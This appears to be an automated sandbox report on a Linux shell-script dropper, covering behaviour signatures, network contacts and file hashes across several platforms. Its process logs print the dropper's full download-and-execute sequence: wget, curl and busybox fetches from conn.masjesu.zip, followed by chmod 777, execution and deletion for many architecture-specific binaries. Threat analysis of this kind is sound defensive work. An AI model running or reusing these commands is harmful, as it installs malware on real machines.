Analysis Overview
SHA256
6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5
Threat Level: Shows suspicious behavior
The file 6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
Writes file to tmp directory
System Network Configuration Discovery
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-28 02:42
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-28 02:42
Reported
2024-10-28 02:44
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
148s
Max time network
128s
Command Line
Signatures
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh
[/tmp/6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| N/A | 224.0.0.251:5353 | | udp |
| GB | 185.125.188.61:443 | | tcp |
| GB | 185.125.188.62:443 | | tcp |
| US | 151.101.129.91:443 | | tcp |
| GB | 89.187.167.5:443 | | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-28 02:42
Reported
2024-10-28 02:44
Platform
debian9-armhf-20240611-en
Max time kernel
149s
Max time network
2s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh
[/tmp/6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-28 02:42
Reported
2024-10-28 02:44
Platform
debian9-mipsbe-20240611-en
Max time kernel
146s
Max time network
150s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
Processes
/tmp/6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh
[/tmp/6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ]
/bin/chmod
[chmod 777 XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ]
/tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ
[./XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ]
/bin/rm
[rm XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
Files
/tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-28 02:42
Reported
2024-10-28 02:44
Platform
debian9-mipsel-20240611-en
Max time kernel
81s
Max time network
80s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead | /usr/bin/curl | N/A |
| File opened for modification | /tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M | /usr/bin/curl | N/A |
| File opened for modification | /tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr | /usr/bin/curl | N/A |
Processes
/tmp/6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh
[/tmp/6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ]
/bin/chmod
[chmod 777 XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ]
/tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ
[./XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ]
/bin/rm
[rm XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1]
/bin/chmod
[chmod 777 jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1]
/tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1
[./jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1]
/bin/rm
[rm jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v]
/bin/chmod
[chmod 777 ekoIDag2IrendezgvRAX8H4MvHggSiH31v]
/tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v
[./ekoIDag2IrendezgvRAX8H4MvHggSiH31v]
/bin/rm
[rm ekoIDag2IrendezgvRAX8H4MvHggSiH31v]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6]
/bin/chmod
[chmod 777 qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6]
/tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6
[./qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6]
/bin/rm
[rm qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5]
/bin/chmod
[chmod 777 Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5]
/tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5
[./Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5]
/bin/rm
[rm Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT]
/bin/chmod
[chmod 777 lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT]
/tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT
[./lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT]
/bin/rm
[rm lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M]
/bin/chmod
[chmod 777 XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M]
/tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M
[./XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M]
/bin/rm
[rm XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub]
/bin/chmod
[chmod 777 jOzMYLHbxyt0kils26CsOKO81vlByx9Cub]
/tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub
[./jOzMYLHbxyt0kils26CsOKO81vlByx9Cub]
/bin/rm
[rm jOzMYLHbxyt0kils26CsOKO81vlByx9Cub]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq50]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq50]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq50]
/bin/chmod
[chmod 777 OESnKxfsceE83uK3qyhjMDf2qeykBknq50]
/tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50
[./OESnKxfsceE83uK3qyhjMDf2qeykBknq50]
/bin/rm
[rm OESnKxfsceE83uK3qyhjMDf2qeykBknq50]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr]
/bin/chmod
[chmod 777 B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr]
/tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr
[./B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr]
/bin/rm
[rm B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead]
/bin/chmod
[chmod 777 IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead]
/tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead
[./IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead]
/bin/rm
[rm IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA]
/bin/chmod
[chmod 777 E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA]
/tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA
[./E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA]
/bin/rm
[rm E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf]
/bin/chmod
[chmod 777 F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf]
/tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf
[./F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf]
/bin/rm
[rm F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF]
/bin/chmod
[chmod 777 ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF]
/tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF
[./ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF]
/bin/rm
[rm ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
Files
/tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |